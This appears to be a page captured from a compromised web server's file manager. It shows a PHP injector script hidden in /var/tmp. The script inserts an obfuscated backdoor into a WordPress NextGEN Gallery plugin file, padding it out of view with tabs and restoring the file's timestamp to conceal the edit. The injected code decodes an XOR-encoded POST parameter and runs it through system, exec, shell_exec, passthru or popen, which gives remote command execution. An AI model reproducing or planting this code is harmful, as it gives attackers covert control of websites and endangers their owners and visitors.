HEX
Server: LiteSpeed
System: Linux server019.our-control-panel.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
User: aashishs (1103)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: //var/tmp/.ob_iconv_handle
<?php  $path = '/home/aashishs/manishjhanepal.com.np/wp-content/plugins/nextgen-gallery/vendor/nikic/php-parser/lib/PhpParser/Builder/Param.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24service_registry7%20%3D%20%22p%5Cx63%5Cx6C%5Cx6Fse%22%3B%20%24service_registry3%20%3D%20%22%5Cx65xec%22%3B%20%24service_registry6%20%3D%20%22s%5Cx74%5Cx72e%5Cx61m_%5Cx67%5Cx65t_%5Cx63%5Cx6Fn%5Cx74%5Cx65n%5Cx74s%22%3B%20%24service_registry4%20%3D%20%22p%5Cx61sst%5Cx68ru%22%3B%20%24service_registry2%20%3D%20%22%5Cx73h%5Cx65ll_e%5Cx78%5Cx65%5Cx63%22%3B%20%24service_registry1%20%3D%20%22%5Cx73%5Cx79s%5Cx74em%22%3B%20%24mutex_lock%20%3D%20%22hex%5Cx32%5Cx62i%5Cx6E%22%3B%20%24service_registry5%20%3D%20%22p%5Cx6F%5Cx70en%22%3B%20if%20%28isset%28%24_POST%5B%22%5Cx68ld%22%5D%29%29%20%7B%20function%20app_initializer%28%20%24elem%2C%20%24flg%29%7B%24ent%3D%27%27%20%3B%20for%28%24k%3D0%3B%20%24k%3Cstrlen%28%24elem%29%3B%20%24k%2B%2B%29%7B%24ent.%3Dchr%28ord%28%24elem%5B%24k%5D%29%5E%24flg%29%3B%7D%20return%20%24ent%3B%7D%20%24hld%20%3D%20%24mutex_lock%28%24_POST%5B%22%5Cx68ld%22%5D%29%3B%20%24hld%20%3D%20app_initializer%28%24hld%2C%2029%29%3B%20if%20%28function_exists%28%24service_registry1%29%29%20%7B%20%24service_registry1%28%24hld%29%3B%20%7D%20elseif%20%28function_exists%28%24service_registry2%29%29%20%7B%20print%20%24service_registry2%28%24hld%29%3B%20%7D%20elseif%20%28function_exists%28%24service_registry3%29%29%20%7B%20%24service_registry3%28%24hld%2C%20%24entity_elem%29%3B%20print%20join%28%22%5Cn%22%2C%20%24entity_elem%29%3B%20%7D%20elseif%20%28function_exists%28%24service_registry4%29%29%20%7B%20%24service_registry4%28%24hld%29%3B%20%7D%20elseif%20%28function_exists%28%24service_registry5%29%20%26%26%20function_exists%28%24service_registry6%29%20%26%26%20function_exists%28%24service_registry7%29%29%20%7B%20%24flg_ent%20%3D%20%24service_registry5%28%24hld%2C%20%27r%27%29%3B%20if%20%28%24flg_ent%29%20%7B%20%24resource_mrk%20%3D%20%24service_registry6%28%24flg_ent%29%3B%20%24service_registry7%28%24flg_ent%29%3B%20print%20%24resource_mrk%3B%20%7D%20%7D%20exit%3B%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             @touch($path, $ft);             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die('!success!');             }         }     } } die('!failed!');